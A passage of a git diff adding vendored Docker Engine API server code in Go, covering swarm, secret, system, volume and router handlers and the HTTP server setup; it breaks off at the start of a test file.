+	if err != nil {
+		logrus.Errorf("Error getting swarm: %v", err)
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, swarm)
+}
+
+func (sr *swarmRouter) updateCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var swarm types.Spec
+	if err := json.NewDecoder(r.Body).Decode(&swarm); err != nil {
+		return err
+	}
+
+	rawVersion := r.URL.Query().Get("version")
+	version, err := strconv.ParseUint(rawVersion, 10, 64)
+	if err != nil {
+		return fmt.Errorf("Invalid swarm version '%s': %s", rawVersion, err.Error())
+	}
+
+	var flags types.UpdateFlags
+
+	if value := r.URL.Query().Get("rotateWorkerToken"); value != "" {
+		rot, err := strconv.ParseBool(value)
+		if err != nil {
+			return fmt.Errorf("invalid value for rotateWorkerToken: %s", value)
+		}
+
+		flags.RotateWorkerToken = rot
+	}
+
+	if value := r.URL.Query().Get("rotateManagerToken"); value != "" {
+		rot, err := strconv.ParseBool(value)
+		if err != nil {
+			return fmt.Errorf("invalid value for rotateManagerToken: %s", value)
+		}
+
+		flags.RotateManagerToken = rot
+	}
+
+	if value := r.URL.Query().Get("rotateManagerUnlockKey"); value != "" {
+		rot, err := strconv.ParseBool(value)
+		if err != nil {
+			return fmt.Errorf("invalid value for rotateManagerUnlockKey: %s", value)
+		}
+
+		flags.RotateManagerUnlockKey = rot
+	}
+
+	if err := sr.backend.Update(version, swarm, flags); err != nil {
+		logrus.Errorf("Error configuring swarm: %v", err)
+		return err
+	}
+	return nil
+}
+
+func (sr *swarmRouter) unlockCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var req types.UnlockRequest
+	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+		return err
+	}
+
+	if err := sr.backend.UnlockSwarm(req); err != nil {
+		logrus.Errorf("Error unlocking swarm: %v", err)
+		return err
+	}
+	return nil
+}
+
+func (sr *swarmRouter) getUnlockKey(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	unlockKey, err := sr.backend.GetUnlockKey()
+	if err != nil {
+		logrus.WithError(err).Errorf("Error retrieving swarm unlock key")
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, &basictypes.SwarmUnlockKeyResponse{
+		UnlockKey: unlockKey,
+	})
+}
+
+func (sr *swarmRouter) getServices(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	filter, err := filters.FromParam(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	services, err := sr.backend.GetServices(basictypes.ServiceListOptions{Filters: filter})
+	if err != nil {
+		logrus.Errorf("Error getting services: %v", err)
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, services)
+}
+
+func (sr *swarmRouter) getService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	service, err := sr.backend.GetService(vars["id"])
+	if err != nil {
+		logrus.Errorf("Error getting service %s: %v", vars["id"], err)
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, service)
+}
+
+func (sr *swarmRouter) createService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var service types.ServiceSpec
+	if err := json.NewDecoder(r.Body).Decode(&service); err != nil {
+		return err
+	}
+
+	// Get returns "" if the header does not exist
+	encodedAuth := r.Header.Get("X-Registry-Auth")
+
+	resp, err := sr.backend.CreateService(service, encodedAuth)
+	if err != nil {
+		logrus.Errorf("Error creating service %s: %v", service.Name, err)
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusCreated, resp)
+}
+
+func (sr *swarmRouter) updateService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var service types.ServiceSpec
+	if err := json.NewDecoder(r.Body).Decode(&service); err != nil {
+		return err
+	}
+
+	rawVersion := r.URL.Query().Get("version")
+	version, err := strconv.ParseUint(rawVersion, 10, 64)
+	if err != nil {
+		return fmt.Errorf("Invalid service version '%s': %s", rawVersion, err.Error())
+	}
+
+	// Get returns "" if the header does not exist
+	encodedAuth := r.Header.Get("X-Registry-Auth")
+
+	registryAuthFrom := r.URL.Query().Get("registryAuthFrom")
+
+	resp, err := sr.backend.UpdateService(vars["id"], version, service, encodedAuth, registryAuthFrom)
+	if err != nil {
+		logrus.Errorf("Error updating service %s: %v", vars["id"], err)
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, resp)
+}
+
+func (sr *swarmRouter) removeService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := sr.backend.RemoveService(vars["id"]); err != nil {
+		logrus.Errorf("Error removing service %s: %v", vars["id"], err)
+		return err
+	}
+	return nil
+}
+
+func (sr *swarmRouter) getServiceLogs(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	// Args are validated before the stream starts because when it starts we're
+	// sending HTTP 200 by writing an empty chunk of data to tell the client that
+	// daemon is going to stream. By sending this initial HTTP 200 we can't report
+	// any error after the stream starts (i.e. container not found, wrong parameters)
+	// with the appropriate status code.
+	stdout, stderr := httputils.BoolValue(r, "stdout"), httputils.BoolValue(r, "stderr")
+	if !(stdout || stderr) {
+		return fmt.Errorf("Bad parameters: you must choose at least one stream")
+	}
+
+	serviceName := vars["id"]
+	logsConfig := &backend.ContainerLogsConfig{
+		ContainerLogsOptions: basictypes.ContainerLogsOptions{
+			Follow:     httputils.BoolValue(r, "follow"),
+			Timestamps: httputils.BoolValue(r, "timestamps"),
+			Since:      r.Form.Get("since"),
+			Tail:       r.Form.Get("tail"),
+			ShowStdout: stdout,
+			ShowStderr: stderr,
+			Details:    httputils.BoolValue(r, "details"),
+		},
+		OutStream: w,
+	}
+
+	if logsConfig.Details {
+		return fmt.Errorf("Bad parameters: details is not currently supported")
+	}
+
+	chStarted := make(chan struct{})
+	if err := sr.backend.ServiceLogs(ctx, serviceName, logsConfig, chStarted); err != nil {
+		select {
+		case <-chStarted:
+			// The client may be expecting all of the data we're sending to
+			// be multiplexed, so send it through OutStream, which will
+			// have been set up to handle that if needed.
+			fmt.Fprintf(logsConfig.OutStream, "Error grabbing service logs: %v\n", err)
+		default:
+			return err
+		}
+	}
+
+	return nil
+}
+
+func (sr *swarmRouter) getNodes(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	filter, err := filters.FromParam(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	nodes, err := sr.backend.GetNodes(basictypes.NodeListOptions{Filters: filter})
+	if err != nil {
+		logrus.Errorf("Error getting nodes: %v", err)
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, nodes)
+}
+
+func (sr *swarmRouter) getNode(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	node, err := sr.backend.GetNode(vars["id"])
+	if err != nil {
+		logrus.Errorf("Error getting node %s: %v", vars["id"], err)
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, node)
+}
+
+func (sr *swarmRouter) updateNode(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var node types.NodeSpec
+	if err := json.NewDecoder(r.Body).Decode(&node); err != nil {
+		return err
+	}
+
+	rawVersion := r.URL.Query().Get("version")
+	version, err := strconv.ParseUint(rawVersion, 10, 64)
+	if err != nil {
+		return fmt.Errorf("Invalid node version '%s': %s", rawVersion, err.Error())
+	}
+
+	if err := sr.backend.UpdateNode(vars["id"], version, node); err != nil {
+		logrus.Errorf("Error updating node %s: %v", vars["id"], err)
+		return err
+	}
+	return nil
+}
+
+func (sr *swarmRouter) removeNode(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	force := httputils.BoolValue(r, "force")
+
+	if err := sr.backend.RemoveNode(vars["id"], force); err != nil {
+		logrus.Errorf("Error removing node %s: %v", vars["id"], err)
+		return err
+	}
+	return nil
+}
+
+func (sr *swarmRouter) getTasks(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	filter, err := filters.FromParam(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	tasks, err := sr.backend.GetTasks(basictypes.TaskListOptions{Filters: filter})
+	if err != nil {
+		logrus.Errorf("Error getting tasks: %v", err)
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, tasks)
+}
+
+func (sr *swarmRouter) getTask(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	task, err := sr.backend.GetTask(vars["id"])
+	if err != nil {
+		logrus.Errorf("Error getting task %s: %v", vars["id"], err)
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, task)
+}
+
+func (sr *swarmRouter) getSecrets(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	filters, err := filters.FromParam(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	secrets, err := sr.backend.GetSecrets(basictypes.SecretListOptions{Filters: filters})
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, secrets)
+}
+
+func (sr *swarmRouter) createSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var secret types.SecretSpec
+	if err := json.NewDecoder(r.Body).Decode(&secret); err != nil {
+		return err
+	}
+
+	id, err := sr.backend.CreateSecret(secret)
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusCreated, &basictypes.SecretCreateResponse{
+		ID: id,
+	})
+}
+
+func (sr *swarmRouter) removeSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := sr.backend.RemoveSecret(vars["id"]); err != nil {
+		return err
+	}
+	w.WriteHeader(http.StatusNoContent)
+
+	return nil
+}
+
+func (sr *swarmRouter) getSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	secret, err := sr.backend.GetSecret(vars["id"])
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, secret)
+}
+
+func (sr *swarmRouter) updateSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var secret types.SecretSpec
+	if err := json.NewDecoder(r.Body).Decode(&secret); err != nil {
+		return errors.NewBadRequestError(err)
+	}
+
+	rawVersion := r.URL.Query().Get("version")
+	version, err := strconv.ParseUint(rawVersion, 10, 64)
+	if err != nil {
+		return errors.NewBadRequestError(fmt.Errorf("invalid secret version"))
+	}
+
+	id := vars["id"]
+	if err := sr.backend.UpdateSecret(id, version, secret); err != nil {
+		return err
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/system/backend.go b/vendor/github.com/docker/docker/api/server/router/system/backend.go
new file mode 100644
index 0000000000..6946c4e2d1
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/system/backend.go
@@ -0,0 +1,21 @@
+package system
+
+import (
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	"golang.org/x/net/context"
+)
+
+// Backend is the methods that need to be implemented to provide
+// system specific functionality.
+type Backend interface {
+	SystemInfo() (*types.Info, error)
+	SystemVersion() types.Version
+	SystemDiskUsage() (*types.DiskUsage, error)
+	SubscribeToEvents(since, until time.Time, ef filters.Args) ([]events.Message, chan interface{})
+	UnsubscribeFromEvents(chan interface{})
+	AuthenticateToRegistry(ctx context.Context, authConfig *types.AuthConfig) (string, string, error)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/system/system.go b/vendor/github.com/docker/docker/api/server/router/system/system.go
new file mode 100644
index 0000000000..ed23d3bdee
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/system/system.go
@@ -0,0 +1,39 @@
+package system
+
+import (
+	"github.com/docker/docker/api/server/router"
+	"github.com/docker/docker/daemon/cluster"
+)
+
+// systemRouter provides information about the Docker system overall.
+// It gathers information about host, daemon and container events.
+type systemRouter struct {
+	backend         Backend
+	clusterProvider *cluster.Cluster
+	routes          []router.Route
+}
+
+// NewRouter initializes a new system router
+func NewRouter(b Backend, c *cluster.Cluster) router.Router {
+	r := &systemRouter{
+		backend:         b,
+		clusterProvider: c,
+	}
+
+	r.routes = []router.Route{
+		router.NewOptionsRoute("/{anyroute:.*}", optionsHandler),
+		router.NewGetRoute("/_ping", pingHandler),
+		router.Cancellable(router.NewGetRoute("/events", r.getEvents)),
+		router.NewGetRoute("/info", r.getInfo),
+		router.NewGetRoute("/version", r.getVersion),
+		router.NewGetRoute("/system/df", r.getDiskUsage),
+		router.NewPostRoute("/auth", r.postAuth),
+	}
+
+	return r
+}
+
+// Routes returns all the API routes dedicated to the docker system
+func (s *systemRouter) Routes() []router.Route {
+	return s.routes
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/system/system_routes.go b/vendor/github.com/docker/docker/api/server/router/system/system_routes.go
new file mode 100644
index 0000000000..0d851b684a
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/system/system_routes.go
@@ -0,0 +1,186 @@
+package system
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/registry"
+	timetypes "github.com/docker/docker/api/types/time"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/pkg/ioutils"
+	"golang.org/x/net/context"
+)
+
+func optionsHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	w.WriteHeader(http.StatusOK)
+	return nil
+}
+
+func pingHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	_, err := w.Write([]byte{'O', 'K'})
+	return err
+}
+
+func (s *systemRouter) getInfo(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	info, err := s.backend.SystemInfo()
+	if err != nil {
+		return err
+	}
+	if s.clusterProvider != nil {
+		info.Swarm = s.clusterProvider.Info()
+	}
+
+	if versions.LessThan(httputils.VersionFromContext(ctx), "1.25") {
+		// TODO: handle this conversion in engine-api
+		type oldInfo struct {
+			*types.Info
+			ExecutionDriver string
+		}
+		old := &oldInfo{
+			Info:            info,
+			ExecutionDriver: "<not supported>",
+		}
+		nameOnlySecurityOptions := []string{}
+		kvSecOpts, err := types.DecodeSecurityOptions(old.SecurityOptions)
+		if err != nil {
+			return err
+		}
+		for _, s := range kvSecOpts {
+			nameOnlySecurityOptions = append(nameOnlySecurityOptions, s.Name)
+		}
+		old.SecurityOptions = nameOnlySecurityOptions
+		return httputils.WriteJSON(w, http.StatusOK, old)
+	}
+	return httputils.WriteJSON(w, http.StatusOK, info)
+}
+
+func (s *systemRouter) getVersion(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	info := s.backend.SystemVersion()
+	info.APIVersion = api.DefaultVersion
+
+	return httputils.WriteJSON(w, http.StatusOK, info)
+}
+
+func (s *systemRouter) getDiskUsage(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	du, err := s.backend.SystemDiskUsage()
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, du)
+}
+
+func (s *systemRouter) getEvents(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	since, err := eventTime(r.Form.Get("since"))
+	if err != nil {
+		return err
+	}
+	until, err := eventTime(r.Form.Get("until"))
+	if err != nil {
+		return err
+	}
+
+	var (
+		timeout        <-chan time.Time
+		onlyPastEvents bool
+	)
+	if !until.IsZero() {
+		if until.Before(since) {
+			return errors.NewBadRequestError(fmt.Errorf("`since` time (%s) cannot be after `until` time (%s)", r.Form.Get("since"), r.Form.Get("until")))
+		}
+
+		now := time.Now()
+
+		onlyPastEvents = until.Before(now)
+
+		if !onlyPastEvents {
+			dur := until.Sub(now)
+			timeout = time.NewTimer(dur).C
+		}
+	}
+
+	ef, err := filters.FromParam(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	w.Header().Set("Content-Type", "application/json")
+	output := ioutils.NewWriteFlusher(w)
+	defer output.Close()
+	output.Flush()
+
+	enc := json.NewEncoder(output)
+
+	buffered, l := s.backend.SubscribeToEvents(since, until, ef)
+	defer s.backend.UnsubscribeFromEvents(l)
+
+	for _, ev := range buffered {
+		if err := enc.Encode(ev); err != nil {
+			return err
+		}
+	}
+
+	if onlyPastEvents {
+		return nil
+	}
+
+	for {
+		select {
+		case ev := <-l:
+			jev, ok := ev.(events.Message)
+			if !ok {
+				logrus.Warnf("unexpected event message: %q", ev)
+				continue
+			}
+			if err := enc.Encode(jev); err != nil {
+				return err
+			}
+		case <-timeout:
+			return nil
+		case <-ctx.Done():
+			logrus.Debug("Client context cancelled, stop sending events")
+			return nil
+		}
+	}
+}
+
+func (s *systemRouter) postAuth(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var config *types.AuthConfig
+	err := json.NewDecoder(r.Body).Decode(&config)
+	r.Body.Close()
+	if err != nil {
+		return err
+	}
+	status, token, err := s.backend.AuthenticateToRegistry(ctx, config)
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, &registry.AuthenticateOKBody{
+		Status:        status,
+		IdentityToken: token,
+	})
+}
+
+func eventTime(formTime string) (time.Time, error) {
+	t, tNano, err := timetypes.ParseTimestamps(formTime, -1)
+	if err != nil {
+		return time.Time{}, err
+	}
+	if t == -1 {
+		return time.Time{}, nil
+	}
+	return time.Unix(t, tNano), nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/volume/backend.go b/vendor/github.com/docker/docker/api/server/router/volume/backend.go
new file mode 100644
index 0000000000..180c06e5d3
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/volume/backend.go
@@ -0,0 +1,17 @@
+package volume
+
+import (
+	// TODO return types need to be refactored into pkg
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+)
+
+// Backend is the methods that need to be implemented to provide
+// volume specific functionality
+type Backend interface {
+	Volumes(filter string) ([]*types.Volume, []string, error)
+	VolumeInspect(name string) (*types.Volume, error)
+	VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error)
+	VolumeRm(name string, force bool) error
+	VolumesPrune(pruneFilters filters.Args) (*types.VolumesPruneReport, error)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/volume/volume.go b/vendor/github.com/docker/docker/api/server/router/volume/volume.go
new file mode 100644
index 0000000000..4e9f972a69
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/volume/volume.go
@@ -0,0 +1,36 @@
+package volume
+
+import "github.com/docker/docker/api/server/router"
+
+// volumeRouter is a router to talk with the volumes controller
+type volumeRouter struct {
+	backend Backend
+	routes  []router.Route
+}
+
+// NewRouter initializes a new volume router
+func NewRouter(b Backend) router.Router {
+	r := &volumeRouter{
+		backend: b,
+	}
+	r.initRoutes()
+	return r
+}
+
+// Routes returns the available routes to the volumes controller
+func (r *volumeRouter) Routes() []router.Route {
+	return r.routes
+}
+
+func (r *volumeRouter) initRoutes() {
+	r.routes = []router.Route{
+		// GET
+		router.NewGetRoute("/volumes", r.getVolumesList),
+		router.NewGetRoute("/volumes/{name:.*}", r.getVolumeByName),
+		// POST
+		router.NewPostRoute("/volumes/create", r.postVolumesCreate),
+		router.NewPostRoute("/volumes/prune", r.postVolumesPrune),
+		// DELETE
+		router.NewDeleteRoute("/volumes/{name:.*}", r.deleteVolumes),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go b/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go
new file mode 100644
index 0000000000..cfd4618a4d
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go
@@ -0,0 +1,80 @@
+package volume
+
+import (
+	"encoding/json"
+	"net/http"
+
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types/filters"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"golang.org/x/net/context"
+)
+
+func (v *volumeRouter) getVolumesList(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	volumes, warnings, err := v.backend.Volumes(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, &volumetypes.VolumesListOKBody{Volumes: volumes, Warnings: warnings})
+}
+
+func (v *volumeRouter) getVolumeByName(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	volume, err := v.backend.VolumeInspect(vars["name"])
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, volume)
+}
+
+func (v *volumeRouter) postVolumesCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	if err := httputils.CheckForJSON(r); err != nil {
+		return err
+	}
+
+	var req volumetypes.VolumesCreateBody
+	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+		return err
+	}
+
+	volume, err := v.backend.VolumeCreate(req.Name, req.Driver, req.DriverOpts, req.Labels)
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusCreated, volume)
+}
+
+func (v *volumeRouter) deleteVolumes(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	force := httputils.BoolValue(r, "force")
+	if err := v.backend.VolumeRm(vars["name"], force); err != nil {
+		return err
+	}
+	w.WriteHeader(http.StatusNoContent)
+	return nil
+}
+
+func (v *volumeRouter) postVolumesPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	pruneReport, err := v.backend.VolumesPrune(filters.Args{})
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, pruneReport)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router_swapper.go b/vendor/github.com/docker/docker/api/server/router_swapper.go
new file mode 100644
index 0000000000..1ecc7a7f39
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router_swapper.go
@@ -0,0 +1,30 @@
+package server
+
+import (
+	"net/http"
+	"sync"
+
+	"github.com/gorilla/mux"
+)
+
+// routerSwapper is an http.Handler that allows you to swap
+// mux routers.
+type routerSwapper struct {
+	mu     sync.Mutex
+	router *mux.Router
+}
+
+// Swap changes the old router with the new one.
+func (rs *routerSwapper) Swap(newRouter *mux.Router) {
+	rs.mu.Lock()
+	rs.router = newRouter
+	rs.mu.Unlock()
+}
+
+// ServeHTTP makes the routerSwapper to implement the http.Handler interface.
+func (rs *routerSwapper) ServeHTTP(w http.ResponseWriter, r *http.Request) {
+	rs.mu.Lock()
+	router := rs.router
+	rs.mu.Unlock()
+	router.ServeHTTP(w, r)
+}
diff --git a/vendor/github.com/docker/docker/api/server/server.go b/vendor/github.com/docker/docker/api/server/server.go
new file mode 100644
index 0000000000..60ee075c79
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/server.go
@@ -0,0 +1,210 @@
+package server
+
+import (
+	"crypto/tls"
+	"fmt"
+	"net"
+	"net/http"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/server/middleware"
+	"github.com/docker/docker/api/server/router"
+	"github.com/gorilla/mux"
+	"golang.org/x/net/context"
+)
+
+// versionMatcher defines a variable matcher to be parsed by the router
+// when a request is about to be served.
+const versionMatcher = "/v{version:[0-9.]+}"
+
+// Config provides the configuration for the API server
+type Config struct {
+	Logging     bool
+	EnableCors  bool
+	CorsHeaders string
+	Version     string
+	SocketGroup string
+	TLSConfig   *tls.Config
+}
+
+// Server contains instance details for the server
+type Server struct {
+	cfg           *Config
+	servers       []*HTTPServer
+	routers       []router.Router
+	routerSwapper *routerSwapper
+	middlewares   []middleware.Middleware
+}
+
+// New returns a new instance of the server based on the specified configuration.
+// It allocates resources which will be needed for ServeAPI(ports, unix-sockets).
+func New(cfg *Config) *Server {
+	return &Server{
+		cfg: cfg,
+	}
+}
+
+// UseMiddleware appends a new middleware to the request chain.
+// This needs to be called before the API routes are configured.
+func (s *Server) UseMiddleware(m middleware.Middleware) {
+	s.middlewares = append(s.middlewares, m)
+}
+
+// Accept sets a listener the server accepts connections into.
+func (s *Server) Accept(addr string, listeners ...net.Listener) {
+	for _, listener := range listeners {
+		httpServer := &HTTPServer{
+			srv: &http.Server{
+				Addr: addr,
+			},
+			l: listener,
+		}
+		s.servers = append(s.servers, httpServer)
+	}
+}
+
+// Close closes servers and thus stop receiving requests
+func (s *Server) Close() {
+	for _, srv := range s.servers {
+		if err := srv.Close(); err != nil {
+			logrus.Error(err)
+		}
+	}
+}
+
+// serveAPI loops through all initialized servers and spawns goroutine
+// with Serve method for each. It sets createMux() as Handler also.
+func (s *Server) serveAPI() error {
+	var chErrors = make(chan error, len(s.servers))
+	for _, srv := range s.servers {
+		srv.srv.Handler = s.routerSwapper
+		go func(srv *HTTPServer) {
+			var err error
+			logrus.Infof("API listen on %s", srv.l.Addr())
+			if err = srv.Serve(); err != nil && strings.Contains(err.Error(), "use of closed network connection") {
+				err = nil
+			}
+			chErrors <- err
+		}(srv)
+	}
+
+	for i := 0; i < len(s.servers); i++ {
+		err := <-chErrors
+		if err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+// HTTPServer contains an instance of http server and the listener.
+// srv *http.Server, contains configuration to create an http server and a mux router with all api end points.
+// l   net.Listener, is a TCP or Socket listener that dispatches incoming request to the router.
+type HTTPServer struct {
+	srv *http.Server
+	l   net.Listener
+}
+
+// Serve starts listening for inbound requests.
+func (s *HTTPServer) Serve() error {
+	return s.srv.Serve(s.l)
+}
+
+// Close closes the HTTPServer from listening for the inbound requests.
+func (s *HTTPServer) Close() error {
+	return s.l.Close()
+}
+
+func (s *Server) makeHTTPHandler(handler httputils.APIFunc) http.HandlerFunc {
+	return func(w http.ResponseWriter, r *http.Request) {
+		// Define the context that we'll pass around to share info
+		// like the docker-request-id.
+		//
+		// The 'context' will be used for global data that should
+		// apply to all requests. Data that is specific to the
+		// immediate function being called should still be passed
+		// as 'args' on the function call.
+		ctx := context.WithValue(context.Background(), httputils.UAStringKey, r.Header.Get("User-Agent"))
+		handlerFunc := s.handlerWithGlobalMiddlewares(handler)
+
+		vars := mux.Vars(r)
+		if vars == nil {
+			vars = make(map[string]string)
+		}
+
+		if err := handlerFunc(ctx, w, r, vars); err != nil {
+			statusCode := httputils.GetHTTPErrorStatusCode(err)
+			errFormat := "%v"
+			if statusCode == http.StatusInternalServerError {
+				errFormat = "%+v"
+			}
+			logrus.Errorf("Handler for %s %s returned error: "+errFormat, r.Method, r.URL.Path, err)
+			httputils.MakeErrorHandler(err)(w, r)
+		}
+	}
+}
+
+// InitRouter initializes the list of routers for the server.
+// This method also enables the Go profiler if enableProfiler is true.
+func (s *Server) InitRouter(enableProfiler bool, routers ...router.Router) {
+	s.routers = append(s.routers, routers...)
+
+	m := s.createMux()
+	if enableProfiler {
+		profilerSetup(m)
+	}
+	s.routerSwapper = &routerSwapper{
+		router: m,
+	}
+}
+
+// createMux initializes the main router the server uses.
+func (s *Server) createMux() *mux.Router {
+	m := mux.NewRouter()
+
+	logrus.Debug("Registering routers")
+	for _, apiRouter := range s.routers {
+		for _, r := range apiRouter.Routes() {
+			f := s.makeHTTPHandler(r.Handler())
+
+			logrus.Debugf("Registering %s, %s", r.Method(), r.Path())
+			m.Path(versionMatcher + r.Path()).Methods(r.Method()).Handler(f)
+			m.Path(r.Path()).Methods(r.Method()).Handler(f)
+		}
+	}
+
+	err := errors.NewRequestNotFoundError(fmt.Errorf("page not found"))
+	notFoundHandler := httputils.MakeErrorHandler(err)
+	m.HandleFunc(versionMatcher+"/{path:.*}", notFoundHandler)
+	m.NotFoundHandler = notFoundHandler
+
+	return m
+}
+
+// Wait blocks the server goroutine until it exits.
+// It sends an error message if there is any error during
+// the API execution.
+func (s *Server) Wait(waitChan chan error) {
+	if err := s.serveAPI(); err != nil {
+		logrus.Errorf("ServeAPI error: %v", err)
+		waitChan <- err
+		return
+	}
+	waitChan <- nil
+}
+
+// DisableProfiler reloads the server mux without adding the profiler routes.
+func (s *Server) DisableProfiler() {
+	s.routerSwapper.Swap(s.createMux())
+}
+
+// EnableProfiler reloads the server mux adding the profiler routes.
+func (s *Server) EnableProfiler() {
+	m := s.createMux()
+	profilerSetup(m)
+	s.routerSwapper.Swap(m)
+}
diff --git a/vendor/github.com/docker/docker/api/server/server_test.go b/vendor/github.com/docker/docker/api/server/server_test.go
new file mode 100644
index 0000000000..11831c148d
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/server_test.go
@@ -0,0 +1,46 @@
+package server
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+
